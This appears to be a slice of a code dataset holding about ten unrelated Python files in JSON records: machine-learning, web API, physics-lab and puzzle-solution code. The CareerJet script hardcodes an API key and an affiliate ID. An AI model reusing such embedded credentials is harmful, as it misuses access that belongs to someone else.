1, 1, 1, 1, 1, 1]], tf.int32)\n self(input_ids, speaker_ids, duration_gts)\n\n def resize_positional_embeddings(self, new_size):\n self.embeddings.resize_positional_embeddings(new_size)\n self._build()\n\n def call(\n self, input_ids, speaker_ids, duration_gts, training=False, **kwargs,\n ):\n \"\"\"Call logic.\"\"\"\n attention_mask = tf.math.not_equal(input_ids, 0)\n embedding_output = self.embeddings([input_ids, speaker_ids], training=training)\n encoder_output = self.encoder(\n [embedding_output, attention_mask], training=training\n )\n last_encoder_hidden_states = encoder_output[0]\n\n # duration predictor, here use last_encoder_hidden_states, u can use more hidden_states layers\n # rather than just use last_hidden_states of encoder for duration_predictor.\n duration_outputs = self.duration_predictor(\n [last_encoder_hidden_states, attention_mask]\n ) # [batch_size, length]\n\n length_regulator_outputs, encoder_masks = self.length_regulator(\n [last_encoder_hidden_states, duration_gts], training=training\n )\n\n # create decoder positional embedding\n decoder_pos = tf.range(\n 1, tf.shape(length_regulator_outputs)[1] + 1, dtype=tf.int32\n )\n masked_decoder_pos = tf.expand_dims(decoder_pos, 0) * encoder_masks\n\n decoder_output = self.decoder(\n [length_regulator_outputs, speaker_ids, encoder_masks, masked_decoder_pos],\n training=training,\n )\n last_decoder_hidden_states = decoder_output[0]\n\n # here u can use sum or concat more than 1 hidden states layers from decoder.\n mel_before = self.mel_dense(last_decoder_hidden_states)\n mel_after = (\n self.postnet([mel_before, encoder_masks], training=training) + mel_before\n )\n\n outputs = (mel_before, mel_after, duration_outputs)\n return outputs\n\n def _inference(self, input_ids, speaker_ids, speed_ratios, **kwargs):\n \"\"\"Call logic.\"\"\"\n attention_mask = tf.math.not_equal(input_ids, 0)\n embedding_output = self.embeddings([input_ids, speaker_ids], training=False)\n encoder_output = self.encoder(\n [embedding_output, attention_mask], training=False\n )\n last_encoder_hidden_states = encoder_output[0]\n\n # duration predictor, here use last_encoder_hidden_states, u can use more hidden_states layers\n # rather than just use last_hidden_states of encoder for duration_predictor.\n duration_outputs = self.duration_predictor(\n [last_encoder_hidden_states, attention_mask]\n ) # [batch_size, length]\n duration_outputs = tf.math.exp(duration_outputs) - 1.0\n\n if speed_ratios is None:\n speed_ratios = tf.convert_to_tensor(np.array([1.0]), dtype=tf.float32)\n\n speed_ratios = tf.expand_dims(speed_ratios, 1)\n\n duration_outputs = tf.cast(\n tf.math.round(duration_outputs * speed_ratios), tf.int32\n )\n\n length_regulator_outputs, encoder_masks = self.length_regulator(\n [last_encoder_hidden_states, duration_outputs], training=False\n )\n\n # create decoder positional embedding\n decoder_pos = tf.range(\n 1, tf.shape(length_regulator_outputs)[1] + 1, dtype=tf.int32\n )\n masked_decoder_pos = tf.expand_dims(decoder_pos, 0) * encoder_masks\n\n decoder_output = self.decoder(\n [length_regulator_outputs, speaker_ids, encoder_masks, masked_decoder_pos],\n training=False,\n )\n last_decoder_hidden_states = decoder_output[0]\n\n # here u can use sum or concat more than 1 hidden states layers from decoder.\n mel_before = self.mel_dense(last_decoder_hidden_states)\n mel_after = (\n self.postnet([mel_before, encoder_masks], training=False) + mel_before\n )\n\n outputs = (mel_before, mel_after, duration_outputs)\n return outputs\n\n def setup_inference_fn(self):\n self.inference = tf.function(\n self._inference,\n experimental_relax_shapes=True,\n input_signature=[\n tf.TensorSpec(shape=[None, None], dtype=tf.int32, name=\"input_ids\"),\n tf.TensorSpec(shape=[None,], dtype=tf.int32, name=\"speaker_ids\"),\n tf.TensorSpec(shape=[None,], dtype=tf.float32, name=\"speed_ratios\"),\n ],\n )\n\n self.inference_tflite = tf.function(\n self._inference,\n experimental_relax_shapes=True,\n input_signature=[\n tf.TensorSpec(shape=[1, None], dtype=tf.int32, name=\"input_ids\"),\n tf.TensorSpec(shape=[1,], dtype=tf.int32, name=\"speaker_ids\"),\n tf.TensorSpec(shape=[1,], dtype=tf.float32, name=\"speed_ratios\"),\n ],\n )\n","repo_name":"TensorSpeech/TensorFlowTTS","sub_path":"tensorflow_tts/models/fastspeech.py","file_name":"fastspeech.py","file_ext":"py","file_size_in_byte":33254,"program_lang":"python","lang":"en","doc_type":"code","stars":3545,"dataset":"github-code","pt":"2"}
+{"seq_id":"73461110766","text":"# Input: nums = [2,7,11,15], target = 9\n# Output: [0,1]\n# Output: Because nums[0] + nums[1] == 9, we return [0, 1].\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n my_dict = {}\n for i, num in enumerate(nums):\n print(i , num)\n my_num = target - nums[i]\n if my_num in my_dict: \n return [my_dict[my_num], i]\n else: my_dict[nums[i]] = i\n return []\n \ndef main():\n my_solution = Solution()\n print(my_solution.twoSum([-3,4,3,90], 0))\n\nmain()","repo_name":"shortstring/Practice-Programing","sub_path":"leet code/1.two_sum.py","file_name":"1.two_sum.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"26007506885","text":"#!/gpfs/exfel/sw/software/xfel_anaconda3/1.1/bin/python\nfrom argparse import ArgumentParser\nimport h5py as h5\nimport multiprocessing as mp\nimport numpy as np\nimport re\nimport subprocess\nimport sys\nimport time\n\nfrom . import config\nfrom . import crystfel_info as cri\nfrom .templates import HDFSEE_WRAP\n\n'''\n idx = np.arange(numFrames, dtype=np.int32)\n k, m = divmod(numFrames, poolSize)\n chunks = [idx[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(poolSize)]\n\n\n args = []\n for n in range(poolSize):\n args.append([VDS_filename, chunks[n]])\n\npoolSize = mp.cpu_count() - 1\nprint('Number of available cores:', poolSize)\n'''\n\ndef read_size_from_file(fn):\n with h5.File(fn, 'r') as f:\n n_frames = len(f['/entry_1/data_1/data'])\n print(f'input data size: {n_frames} frames')\n return n_frames\n\n\ndef pix_max_over_frames(fn, n_frames):\n if (n_frames % 1000) == 0:\n n_chunks = int(n_frames / 1000)\n else: \n n_chunks = n_frames // 1000 + 1\n print(f'will find max in {n_chunks} chunks.')\n _px_max = []\n\n with h5.File(fn, 'r') as f:\n _data = f['/entry_1/data_1/data'] # reference only\n for i in range(n_chunks):\n low = 1000 * i\n high = min(1000 * (i+1), n_frames)\n t1 = time.time()\n # data = _data[low:high] # instantiation of array\n data = np.zeros((high-low,) + _data.shape[1:], dtype=_data.dtype)\n k = 0\n for j in range(low, high):\n data[k] = _data[j]\n k += 1\n t2 = time.time()\n print(f'sub-max for range {low:5d} to {high:5d}')\n data[np.isnan(data)] = 0.\n _px_max.append(np.max(data, axis=0))\n t3 = time.time()\n print(f'reading: {(t2 - t1):.3f} s, maximizing: {(t3 - t2):.3f} s')\n px_max = np.max(np.stack(_px_max, axis=0), axis=0)\n print('pixel array:', px_max.shape)\n print('maxing finished.')\n return px_max\n\n\ndef write_hdf5(data, fn):\n data = np.expand_dims(data, axis=0)\n print('output data', data.shape)\n with h5.File(fn, 'w') as f:\n ds = f.create_dataset('entry_1/data_1/data', data=data)\n print('writing finished.')\n\n\ndef display_hdf5(fn, geom, crystfel_version):\n crystfel_import = cri.crystfel_info[crystfel_version]['import']\n\n with open('_hdfsee.sh', 'w') as f:\n f.write(HDFSEE_WRAP % {\n 'IMPORT_CRYSTFEL': crystfel_import,\n 'DATA_FILE': fn,\n 'GEOM': geom\n })\n subprocess.check_output(['sh', '_hdfsee.sh'])\n\n\ndef main(argv=None):\n ap = ArgumentParser(prog='powder.py')\n ap.add_argument('vds_in', help='input VDS file name (multi-frame data)')\n ap.add_argument('h5_out', help='output HDF5 file name (virtual powder image)')\n ap.add_argument('--display', help='optional display')\n args = ap.parse_args(argv)\n\n conf = config.load_from_file()\n n_frames = read_size_from_file(args.vds_in)\n crystfel_version = conf['crystfel']['version']\n max_frames = conf['data']['n_frames_total']\n geom = conf['geom']['file_path']\n if max_frames < n_frames:\n print(f' truncation to {max_frames} frames.')\n n_frames = int(min(n_frames, max_frames))\n max_data = pix_max_over_frames(args.vds_in, n_frames)\n write_hdf5(max_data, args.h5_out)\n if args.display is None:\n \tdisplay_hdf5(args.h5_out, geom, crystfel_version)\n\n","repo_name":"European-XFEL/EXtra-Xwiz","sub_path":"extra_xwiz/powder.py","file_name":"powder.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"70888816688","text":"# FIRST SENTENCE\n#Shoutout to Francis my classmate for teaching me the while loop to handle improper user input\nfrom termcolor import colored\nnoun1 = input(\"Enter a noun(City in the Midwest USA): \")\nwhile len(noun1) == 0:\n noun1 = input(\"Enter again: \")\n \n# SECOND SENTENCE \nadjective1 = input(\"Enter an adjective: \")\nwhile len(adjective1) == 0:\n adjective1 = input(\"Enter again: \")\n\nadjective2 = input(\"Enter an adjective: \")\nwhile len(adjective2) == 0:\n adjective2 = input(\"Enter again: \")\n\nconjection1 = input(\"Enter a conjunction: \")\nwhile len(conjection1) == 0:\n conjunction1 = input(\"Enter again: \")\n\nadjective3 = input(\"Enter an adjective: \")\nwhile len(adjective3) == 0:\n adjective3 = input(\"Enter again: \")\n\n# THIRD SENTENCE \nadjective4 = input(\"Enter an adjective: \")\nwhile len(adjective4) == 0:\n adjective4 = input(\"Enter again: \")\n\nadjective5 = input(\"Enter an adjective: \")\nwhile len(adjective5) == 0:\n adjective5 = input(\"Enter again: \")\n\nadverb1 = input(\"Enter an adverb: \")\nwhile len(adverb1) == 0:\n adverb1 = input(\"Enter again: \")\n\nverb1 = input(\"Enter a verb: \")\nwhile len(verb1) == 0:\n verb1 = input(\"Enter again: \")\n\n#FOURTH SENTENCE \npronoun1 = input(\"Enter a pronoun: \")\nwhile len(pronoun1) == 0:\n pronoun1 = input(\"Enter again: \")\n\nadjective6 = input(\"Enter an adjective: \")\nwhile len(adjective6) == 0:\n adjective6 = input(\"Enter again: \")\n\nadjective7 = input(\"Enter an adjective: \")\nwhile len(adjective7) == 0:\n adjective7 = input(\"Enter again: \")\n\nadjective8 = input(\"Enter an adjective: \")\nwhile len(adjective8) == 0:\n adjective8 = input(\"Enter again: \")\n\n# FIFTH SENTENCE \nadjective9 = input(\"Enter an adjective: \")\nwhile len(adjective9) == 0:\n adjective9 = input(\"Enter again: \")\n\n# SIXTH SENTENCE\nnoun2 = input(\"Enter a noun(a thing): \")\nwhile len(noun2) == 0:\n noun2 = input(\"Enter again: \")\n\nadjective10 = input(\"Enter an adjective: \")\nwhile len(adjective10) == 0:\n adjective10 = input(\"Enter again: \")\n\n\n\n\n#OUTPUT FUNCTION\ndef output():\n print(f\"Micheal Jackson was born in {colored(noun1,'red')} USA in 1958.\") \n print(f\"He was a {colored(adjective1, 'red')} performer with a {colored(adjective2, 'red')} voice {colored(conjection1, 'red')} a {colored(adjective3, 'red')} personality.\")\n print(f\"Although he was a {colored(adjective4, 'red')} person, his family and friends thought he was {colored(adjective5, 'red')} for {colored(adverb1, 'red')}, {colored(verb1, 'red')} when he interacted with fans.\")\n print(f\"{colored(pronoun1, 'red')} became famous for creating {colored(adjective6, 'red')} music, {colored(adjective7, 'red')} collaborations, and {colored(adjective8, 'red')} love for his fans. In 1984, Jackson was\")\n print(f\"{colored(adjective9, 'red')} onto the Hollywood Walk of Fame.\")\n print(f\"After his death in 2009, Jackson’s {colored(noun2, 'red')} was released for his fans, becoming the most {colored(adjective10, 'red')} documentary or concert film ever.\")\n\noutput() \n\n\n\n","repo_name":"Jarquevious/MadLibs","sub_path":"mj.py","file_name":"mj.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"13100085172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.http import Http404\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom program_section.serializers import *\n\n\nclass ProgramList(APIView):\n \"\"\"\n List all program, or create a new program\n \"\"\"\n\n def get(self, request, format=None):\n program = Program.objects.all()\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(program, many=True)\n else:\n serializer = ProgramSerializer(program, many=True)\n\n return Response(serializer.data)\n\n def post(self, request, format=None):\n\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(data=request.data)\n else:\n serializer = ProgramSerializer(data=request.data)\n\n # serializer = ProgramWriteSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProgramDetail(APIView):\n \"\"\"\n Retrieve, update or delete a program instance.\n \"\"\"\n\n def get_object(self, pk):\n try:\n return Program.objects.get(pk=pk)\n except Program.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n program = self.get_object(pk)\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(program)\n else:\n serializer = ProgramSerializer(program)\n\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n program = self.get_object(pk)\n\n if (request.GET.get('verbose') == 'true'):\n serializer = ProgramVerboseSerializer(program, data=request.data)\n else:\n serializer = ProgramSerializer(program, data=request.data)\n\n # serializer = ProgramSerializer(program, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n program = self.get_object(pk)\n Program.delete(program)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass ProgramsByEmail(APIView):\n\n def get(self, request, format=None):\n observer = Observer.objects.get(email=request.GET.get('email'))\n try:\n queryset = Program.objects.filter(observers__id=observer.id)\n if not len(queryset):\n return Response({\"error\": \"Observer without programs.\"}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = ProgramVerboseSerializer(queryset, many=True)\n return Response(serializer.data)\n except Program.DoesNotExist:\n return Response({\"error\": \"E-mail not found.\"}, status=status.HTTP_404_NOT_FOUND)\n\n\nclass ProgramsByParticipantEmail(APIView):\n\n def get(self, request, format=None):\n participant = Participant.objects.get(email=request.GET.get('email'))\n try:\n queryset = Program.objects.filter(participants__id=participant.id)\n if not len(queryset):\n return Response({\"error\": \"Participant without programs.\"}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = ProgramVerboseSerializer(queryset, many=True)\n return Response(serializer.data)\n except Program.DoesNotExist:\n return Response({\"error\": \"E-mail not found.\"}, status=status.HTTP_404_NOT_FOUND)\n","repo_name":"leoscalco/esm-rest-service","sub_path":"program_section/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"13297044205","text":"class Solution:\n def uniquePathsWithObstacles(self, obstacleGrid) -> int:\n if obstacleGrid[-1][-1] == 1:\n return 0\n m = len(obstacleGrid)\n n = len(obstacleGrid[0])\n l = [[0 for _ in range(n)] for _ in range(m)]\n l[0] = [1 for _ in range(n)]\n for i in range(m):\n for j in range(n):\n if i == 0 and j == 0:\n continue\n if i == 0:\n l[i][j] = (l[i][j - 1] if obstacleGrid[i][j - 1] == 0 else 0)\n elif j == 0:\n l[i][j] = (l[i - 1][j] if obstacleGrid[i - 1][j] == 0 else 0)\n else:\n l[i][j] = (l[i][j - 1] if obstacleGrid[i][j - 1] == 0 else 0) + (\n l[i - 1][j] if obstacleGrid[i - 1][j] == 0 else 0)\n\n return l[m - 1][n - 1]\n\n\nif __name__ == '__main__':\n s = Solution()\n r = s.uniquePathsWithObstacles(\n [[0, 1], [0, 0]]\n )\n print(r)\n","repo_name":"KaGen1999/Leetcode-by-Python","sub_path":"63不同路径2.py","file_name":"63不同路径2.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5061412912","text":"from calendar import HTMLCalendar\nfrom datetime import datetime as dtime, date, time\nimport datetime\nfrom .models import Schedule\n\n\nclass ScheduleCalendar(HTMLCalendar):\n def __init__(self, schedules=None):\n super().__init__()\n self.schedules = schedules\n\n def formatday(self, day, weekday, schedules, theyear, themonth, today, selected):\n schedules_from_day = schedules.filter(schedule__day=day)\n schedules_html = \"\"\n\n celebrities = []\n for schedule in schedules_from_day:\n celebrities.extend(schedule.get_celebrity())\n schedules_html += '
'.join(list(set(celebrities)))\n schedules_html += \"
\"\n\n if selected.day == day:\n css = 'selected'\n elif today.day == day:\n css = 'today'\n else:\n css = ''\n\n if day == 0:\n return ' | '\n else:\n return \"\"\"%d%s | \"\"\" % (\n \"%s %s\" % (self.cssclasses[weekday], css), '{0}-{1}-{2}'.format(theyear, themonth, day), day, schedules_html)\n\n def formatweek(self, theweek, schedules, theyear, themonth, today, selected):\n s = ''.join(self.formatday(d, wd, schedules, theyear, themonth, today, selected)\n for (d, wd) in theweek)\n return '%s
' % s\n\n def formatmonth(self, theyear, themonth, today, selected, withyear=True):\n schedules = Schedule.objects.filter(schedule__month=themonth)\n\n v = []\n a = v.append\n a('')\n a('\\n')\n a(self.formatweekheader())\n a('\\n')\n for week in self.monthdays2calendar(theyear, themonth):\n a(self.formatweek(week, schedules, theyear, themonth, today, selected))\n a('\\n')\n a('
')\n a('\\n')\n return ''.join(v)\n","repo_name":"springkjw/celuv-django","sub_path":"apps/schedules/calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"73377319725","text":"# -*- coding: utf-8 -*-\nfrom poke_env.environment.battle import Battle\nfrom poke_env.player.battle_order import BattleOrder, ForfeitBattleOrder\nfrom poke_env.player.env_player import Gen8EnvSinglePlayer\n\nclass Gen8EnvSinglePlayerFixed(Gen8EnvSinglePlayer):\n \"\"\"\n Fixes an issue with inconsistencies in the order of items\n in battle.team vs battle.available_switches\n and battle.active_pokemon.moves vs battle.available_moves\n Ref: https://github.com/hsahovic/poke-env/issues/292\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(Gen8EnvSinglePlayerFixed, self).__init__(*args, **kwargs)\n self.done_training = False\n\n def action_to_move(self, action: int, battle: Battle) -> BattleOrder:\n \"\"\"Converts actions to move orders.\n\n The conversion is done as follows:\n\n action = -1:\n The battle will be forfeited.\n 0 <= action < 4:\n The actionth available move in battle.active_pokemon.moves is \n executed.\n 4 <= action < 8:\n The action - 4th available move in battle.active_pokemon.moves is \n executed, with z-move.\n 8 <= action < 12:\n The action - 8th available move in battle.active_pokemon.moves is \n executed, with mega-evolution.\n 12 <= action < 16:\n The action - 12th available move in battle.active_pokemon.moves is \n executed, while dynamaxing.\n 16 <= action < 22\n The action - 16th available switch in battle.team is executed.\n\n If the proposed action is illegal, a random legal move is performed.\n\n :param action: The action to convert.\n :type action: int\n :param battle: The battle in which to act.\n :type battle: Battle\n :return: the order to send to the server.\n :rtype: str\n \"\"\"\n moves = list(battle.active_pokemon.moves.values())\n team = list(battle.team.values())\n force_switch = (len(battle.available_switches) > 0) and battle.force_switch\n # We use the ID of each move here since in some cases\n # The same moves might be in both battle.available_moves\n # and battle.active_pokemon.moves but they may not be the same object\n available_move_ids = [move.id for move in battle.available_moves]\n available_z_moves = [move.id for move in battle.active_pokemon.available_z_moves]\n\n if action == -1:\n return ForfeitBattleOrder()\n # Special case for moves that are never a part of pokemon.moves\n # Example: Struggle, Locked into Outrage via Copycat\n elif (\n action < 4\n and action < len(moves)\n and not force_switch\n and len(available_move_ids) == 1\n ):\n return self.agent.create_order(battle.available_moves[0])\n elif (\n action < 4\n and action < len(moves)\n and not force_switch\n and moves[action].id in available_move_ids\n ):\n return self.agent.create_order(moves[action])\n elif (\n battle.can_z_move\n and battle.active_pokemon\n and 0 <= action - 4 < len(moves)\n and not force_switch\n and moves[action - 4].id in available_z_moves\n ):\n return self.agent.create_order(moves[action - 4], z_move=True)\n elif (\n battle.can_mega_evolve\n and 0 <= action - 8 < len(moves)\n and not force_switch\n and moves[action - 8].id in available_move_ids\n ):\n return self.agent.create_order(moves[action - 8], mega=True)\n elif (\n battle.can_dynamax\n and 0 <= action - 12 < len(moves)\n and not force_switch\n and moves[action - 12].id in available_move_ids\n ):\n return self.agent.create_order(moves[action - 12], dynamax=True)\n elif (\n not battle.trapped\n and 0 <= action - 16 < len(team)\n and team[action - 16] in battle.available_switches\n ):\n return self.agent.create_order(team[action - 16])\n else:\n return self.agent.choose_random_move(battle)\n","repo_name":"akashsara/meta-discovery","sub_path":"src/agents/env_player.py","file_name":"env_player.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"41003452483","text":"import requests\r\nimport numpy as np\r\nfrom requests.exceptions import HTTPError\r\n\r\n# Github link for more description on this API: https://github.com/careerjet/careerjet-api-client-python\r\nprojectId = \"nth-honor-259919\"\r\nkey = \"5f414fcedee8f11f5c8116653559c13daa2dbe03\"\r\n\r\naffId = \"8acafed2c2c1c95fdd17ea85633d394a\"\r\nfrom careerjet_api_client import CareerjetAPIClient\r\n\r\ncj = CareerjetAPIClient(\"en_US\");\r\nresult_json = cj.search({\r\n 'location' : 'seattle',\r\n 'keywords' : 'java&python&aws',\r\n 'pagesize' : '5',\r\n 'affid' : \"8acafed2c2c1c95fdd17ea85633d394a\",\r\n 'user_ip' : '209.141.193.102',\r\n 'url' : 'https://www.seekrlabs.com/jobsearch?q=python&l=london',\r\n 'user_agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'\r\n });\r\n\r\nprint(result_json)","repo_name":"SeekrLabs/JobSearchAPI","sub_path":"CareerJetAPI.py","file_name":"CareerJetAPI.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"1961672119","text":"# Double rotate and take image for DRRP method. Make sure the second motor rotates at 5x the rate of the first\r\n# Rotate the first quarter-wave plate between 0 and 180 degrees in 4 or 5 degree steps, depending how much data you want\r\n# Make sure to connect and home both rotators using the Kinesis app BEFORE running this script\r\n# Remember to change the image file name and folder destination as desired\r\n\r\nimport FliSdk_V2 as sdk\r\nfrom astropy.io import fits\r\nimport numpy as np\r\nimport time\r\nfrom pylablib.devices import Thorlabs\r\nimport copy\r\n\r\n# Setting context\r\ncontext = sdk.Init()\r\n\r\nprint(\"Detection of grabbers...\")\r\nlistOfGrabbers = sdk.DetectGrabbers(context)\r\n\r\nif len(listOfGrabbers) == 0:\r\n print(\"No grabber detected, exit.\")\r\n exit()\r\n\r\nprint(\"Done.\")\r\nprint(\"List of detected grabber(s):\")\r\n\r\nfor s in listOfGrabbers:\r\n print(\"- \" + s)\r\n\r\nprint(\"Detection of cameras...\")\r\nlistOfCameras = sdk.DetectCameras(context)\r\n\r\nif len(listOfCameras) == 0:\r\n print(\"No camera detected, exit.\")\r\n exit()\r\n\r\nprint(\"Done.\")\r\n\r\ncameraIndex = 0\r\nprint(\"Setting camera: \" + listOfCameras[cameraIndex])\r\nok = sdk.SetCamera(context, listOfCameras[cameraIndex])\r\n\r\nif not ok:\r\n print(\"Error while setting camera.\")\r\n exit()\r\n\r\nprint(\"Setting mode full.\")\r\n\r\nok = sdk.Update(context)\r\nprint(\"Updating...\")\r\nif not ok:\r\n print(\"Error Updating\")\r\n exit()\r\n\r\nres, mb, fe, pw, init_sensor_temp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context)\r\nif res:\r\n print(\"Initial Temp: {:.2f}C\".format(init_sensor_temp))\r\nelse:\r\n print(\"Error reading temperature.\")\r\n\r\n# Querying sensor temperature\r\ntry:\r\n set_temp = input(\"Temperature to set? (between \" + str(-55) + \" C and \" + str(20)+ \" C) \")\r\n set_temp = float(set_temp)\r\n ok = sdk.FliCredTwo.SetSensorTemp(context, float(set_temp))\r\n if not ok:\r\n print(\"Error while setting temperature.\")\r\n exit()\r\nexcept ValueError:\r\n print(\"Not a valid temperature\")\r\n\r\nok = sdk.Update(context)\r\nprint(\"Starting to cool...\")\r\nif not ok:\r\n print(\"Error while updating.\")\r\n exit()\r\n\r\nres, mb, fe, pw, sensortemp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context);\r\n\r\ntemp_tolerance = 0.3 #get close temp but don't print infinitely\r\n\r\nwhile np.abs(sensortemp - set_temp) >= temp_tolerance:\r\n res, mb, fe, pw, sensortemp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context)\r\n print(\"Sensor Temp: {:.2f}C\".format(sensortemp),'\\n','-------------')\r\n time.sleep(5)\r\n\r\nres, mb, fe, pw, sensortemp, peltier, heatsink = sdk.FliCredTwo.GetAllTemp(context)\r\nprint(\"Finished Setting Temperature\",'\\n',\"Final Temp: {:.2f}C\".format(sensortemp))\r\n\r\n# Control the fps\r\nfps = 0\r\n\r\nif sdk.IsSerialCamera(context):\r\n res, fps = sdk.FliSerialCamera.GetFps(context)\r\nelif sdk.IsCblueSfnc(context):\r\n res, fps = sdk.FliCblueSfnc.GetAcquisitionFrameRate(context)\r\nprint(\"Current camera FPS: \" + str(fps))\r\n\r\n\r\nval_fps = input(\"FPS to set? \")\r\nif val_fps.isnumeric():\r\n if sdk.IsSerialCamera(context):\r\n sdk.FliSerialCamera.SetFps(context, float(val_fps))\r\n elif sdk.IsCblueSfnc(context):\r\n sdk.FliCblueSfnc.SetAcquisitionFrameRate(context, float(val_fps))\r\n\r\n\r\nif sdk.IsCredTwo(context) or sdk.IsCredThree(context):\r\n res, response = sdk.FliSerialCamera.SendCommand(context, \"mintint raw\")\r\n minTint = float(response)\r\n\r\n res, response = sdk.FliSerialCamera.SendCommand(context, \"maxtint raw\")\r\n maxTint = float(response)\r\n\r\n res, response = sdk.FliSerialCamera.SendCommand(context, \"tint raw\")\r\n\r\n print(\"Current camera tint: \" + str(float(response)*1000) + \"ms\")\r\n\r\n set_tint = input(\"Tint to set? (between \" + str(minTint*1000) + \"ms and \" + str(maxTint*1000)+ \"ms) \")\r\n sdk.FliCredTwo.SetTint(context, float(float(set_tint)/1000))\r\n ok = sdk.Update(context)\r\n if not ok:\r\n print(\"error setting tint\")\r\n exit()\r\n\r\n res, response = sdk.FliCredTwo.GetTint(context)\r\n tint = response*1000\r\n print(\"Current camera tint: \" +str(tint) +\"ms\")\r\n\r\n\r\nres = sdk.FliCredTwo.SetConversionGain(context,'low')\r\nif not res:\r\n print('error setting gain mode')\r\nsdk.Update(context)\r\n\r\nval = input(\"Take how many images?\")\r\nval = int(val)\r\n\r\n\r\n# Now that the camera is setup, prepare for rotating while taking picrues\r\n# Most secure way is to ensure connection with the motor through the Kinesis app before running code\r\n\r\nstage1 = Thorlabs.KinesisMotor(Thorlabs.list_kinesis_devices()[0][0],scale='stage')\r\nstage2 = Thorlabs.KinesisMotor(Thorlabs.list_kinesis_devices()[1][0], scale='stage')\r\nprint(\"Connected to K10CR1 devices\")\r\n\r\nprint(\"Homing devices...\")\r\nstage1.move_to(0)\r\nstage1.wait_move()\r\nstage1._setup_homing()\r\nhome1 = stage1.home(sync=True)\r\n\r\nstage2.move_to(0)\r\nstage2.wait_move()\r\nstage2._setup_homing()\r\nhome2 = stage2.home(sync=True)\r\nprint('Homing complete')\r\n\r\nposition1 = stage1.get_position()\r\nposition2 = stage2.get_position()\r\n\r\nprint('Current positions are ' + str(position1) + ' and ' + str(position2) + ' degrees')\r\n\r\n# Query the user what angle range and what increments\r\ntot_angle = input(\"Total angle to rotate (degrees)?\")\r\nincrement = input(\"Increment angle to change?\")\r\n\r\nsteps = int(tot_angle)/int(increment)\r\n\r\nprint(\"Taking images...\")\r\n\r\nfor i in range(int(steps)+1):\r\n sdk.EnableGrabN(context, val+1)\r\n sdk.Update(context)\r\n sdk.Start(context)\r\n time.sleep(val*tint/1000)\r\n counter = 0\r\n max_iter = 10\r\n while sdk.IsGrabNFinished(context) is False:\r\n if counter >= max_iter:\r\n break\r\n time.sleep(1)\r\n counter += 1\r\n print(\"Is grab finished? \" + str(sdk.IsGrabNFinished(context)))\r\n\r\n frame_list = []\r\n # Now begin loop for the images\r\n #fname = r\"C:\\\\Users\\\\EPL User\\\\Desktop\\\\DRRP_HWP_Characterization\\\\Uncoated_JHK\\\\Calibrations\\\\Calibrations_Raw\\\\Cal_1400_Filter\\\\\"\r\n fname = r\"C:\\\\Users\\\\EPL User\\\\Desktop\\\\DRRP_HWP_Characterization\\\\Uncoated_JHK\\\\Uncoated_Raw\\\\Uncoated_1400_Filter\\\\\"\r\n\r\n for j in range(val+1):\r\n image16b = copy.deepcopy(sdk.GetRawImageAsNumpyArray(context, j))\r\n time.sleep(1.3*tint/1000)\r\n\r\n if j > 0:\r\n frame_list.append(image16b)\r\n \r\n frame_list = np.array(frame_list) \r\n hdu_new = fits.PrimaryHDU(frame_list)\r\n position1 = stage1.get_position()\r\n position2 = stage2.get_position() \r\n print('Position 1 is ' + str(position1) + ' and position 2 is ' + str(position2))\r\n hdu_new.writeto(fname+ \"DRRP_Uncoated_1400nm_\"+str(val_fps)+\"_\"+str(set_tint)+\"_\"+str(position1)+\".fits\", overwrite = True)\r\n print(\"Files saved to \" + str(fname))\r\n\r\n stage1.move_by(int(increment))\r\n stage1.wait_move()\r\n stage2.move_by(5*int(increment))\r\n stage2.wait_move()\r\n sdk.Stop(context)\r\n\r\n\r\nprint(\"Exiting SDK, Process 